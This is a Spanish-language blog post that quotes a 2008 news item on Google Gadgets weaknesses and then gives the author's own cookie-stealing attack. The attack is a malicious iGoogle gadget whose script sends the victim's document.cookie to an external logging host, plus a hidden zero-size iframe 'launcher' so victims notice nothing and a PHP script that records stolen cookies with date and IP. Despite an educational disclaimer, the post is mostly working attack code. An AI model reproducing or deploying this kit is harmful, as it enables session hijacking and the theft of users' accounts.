Hace no muchos dias salio esta noticia:

Los expertos reunidos en Black Hat creen que los usuarios de Google y sobre todo Gmail son más vulnerables a los ataques a través del “agujero” de Google Gadgets.

“El atacante puede instalar Google Gadgets; puede leer el historial de la víctima después de instalar un gadget malicioso en ciertas circunstancias; puede atacar a otros Google Gadgets; robar los nombres de usuario y contraseñas y mucho más”, explicó Robert Hansen, también conocido como RSnake, fundador de la consultora de seguridad SecTheory, y continuó: “de verdad que no hay límite cuando el navegador es controlado por el atacante. Y este hecho se magnifica porque la gente confía en Google como en un dominio seguro, haciendo que los ataques sean aún más fáciles”.

Hansen comentó que los usuarios más vulnerables son aquellos que utilizan Google y Gmail desde el servicio de correo electrónico basado en Web para registrarse. El ataque se produce a través de usuarios que añaden módulos intencionadamente; un usuario puede ser engañado para que añada un módulo malicioso a su página iGoogle. “Estos usuarios utilizan casi todos JavaScript y navegadores web normales, por lo que resulta difícil reconocerlos”, añadió.

Tom Stracener, analista de seguridad de Cenzic está de acuerdo. Las fórmulas son variadas y va extendiéndose conforme aumenta el número de personas que confían en el sitio de creación de página de inicio de Google, incluido las empresas.

Código:
http://www.theinquirer.es/2008/08/11/google-gadgets-es-un-coladero-para-los-ataques.html


Pero inyexion y yo ya habiamos encontrado dichos bugs mucho antes e incluso escribimos algo acerca del tema:



Errores Estructurales en los Servicios de Google

Antes que nada quiero decir que este texto solo es una demostracion hacia el sistema de que tienen problemas (en este caso solo sito a google, pero podria hacer muchas anotaciones de otros sistemas), este texto no fue hecho para el uso de lammers, este texto es solo con fines educativos y demostrativos hacia empresas de clase mundial.

Google ademas de ser un buscador nos proporciona de muchos servicios entre los cuales esta iGoogle, Gmail, Google Pages, Google Docs, etc. Pero apesar de ser una de las empresas mas grandes y famosas del mundo, no tiene un buen mecanismo de seguridad, por ejemplo si miramos una cookie podemos denotar muchas cosas:

Citar
GX=AQUI el GX ID; gmailchat=email@gmail.com/ID; S=gmail=Mas IDs y Llaves de los servidores Proxy; GMAIL_AT=ID AT; PREF=ID=Referentes a la Fecha; SID=EL SID; GMAIL_HELP=hosted:0; TZ=-60

pero apesar de todo ello, yo no denoto que se especifique un host o subdominio, siendo asi, los navegadores no detectan de que subdominio son las cookies, pero si que son de google (en este caso seria mail.google.com, pero solo guarda google.com), esto lo hace google, por que utiliza las mismas cookies para todos sus servicios, ya sea iGoogle, o gmail. Ahora Continuemos....

iGoogle, le permite a los programadores, crear gadgets, que son herramientas programadas en XML, pero no tiene nada que evite ejecutar algo mas que XML, ademas de que XML, permite interpretar algo mas que solo etiquetas jeje, el siguiente bug fue descubierto por inyexion, y el exploit fue codeado por mi:

exploit.xml
Código:
<?xml version="1.0" encoding="UTF-8" ?>
<Module>
<ModulePrefs title="Gmail Exploit By UxMal" />
<Content type="html">
<![CDATA[
<script>
document.location='http://phreackersworld.phpnet.us/cookie.php?cookie= ' +document.cookie</script>
]]>
</Content>
</Module>

supongamos que esto lo corremos en un server externo (es decir el nuestro), pero el navegador al ejecutar este codigo detecta que se esta cargando desde otra url, y por lo tanto lo que nos daria sera la cookie de nuestro server, y no de google, pero supongamos que subimos ese xml a nuestro server de google page:
Citar

bueno ya lo hice, ahora la cosa es cargar ese xml en google, podriamos ir a nuestra cuenta, darle agregar gadget, y colocar la url del exploit, pero si queremos infectar a una victima agenta a nosotros tendriamos que hacer que la victima coloque la url, y seria algo similar a usar troyanos, para ello podemos crear un lanzador, es decir una aplicacion que cree el backdoor (llamemos asi) en la cuenta de la otra persona, para ello podriamos hacer un post, pero si queremos hacer correctamente las cosas, analizamos iGoogle, y detectamos esto:

http://9.gmodules.com/ig/ifr?url=http://uxmal666.googlepages.com/exploit.xml
(inyexion fue quien denoto esto)

es decir que no se necesita hacer post ni nada similar para cargar un xml, para ello simplemente queda hacer que el usuario abra dicha url, y con ello ejecutamos el exploit, bueno seria algo asi:

Código:
<iframe width="0%" height="0" scrolling=0 src="http://9.gmodules.com/ig/ifr?url=http://uxmal666.googlepages.com/exploit.xml" frameborder="0"> </iframe>

es decir este seria el lanzador, se crea un frame el usuario no nota nada y se le roba la cookie, pero claro, la gente que sabe de esto me diria, y que rayos es el cookie.php? pues es el php que guarda la cookie:

Código:
<?php
$fecha = date("d/m/y H:i:s ",mktime(date('H')+6,date('i'),date('s'),date('m'),date('d'),date('y')));
$ip = $_SERVER['REMOTE_ADDR'];

$cookie = $_GET["cookie"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, "$fecha, $ip, $cookie\n\n");
?>

en este caso le dije que guardara la fecha, la ip, y la cookie, tengo que denotar, que esto no es para que salgan lammers que se digan dioses, por colocar esto en sus webs, esto solo es una tecnica parsial para realizar un ataque HTTP, ademas de una demostracion hacia google, de que tiene problemas.... Por ahora lo unico que les puedo recomendar a los usuarios es que usen alguna herramienta o complemente para evitar ejecutar JS, esto solo con el fin de evitar tener problemas de este tipo.

0 comentarios: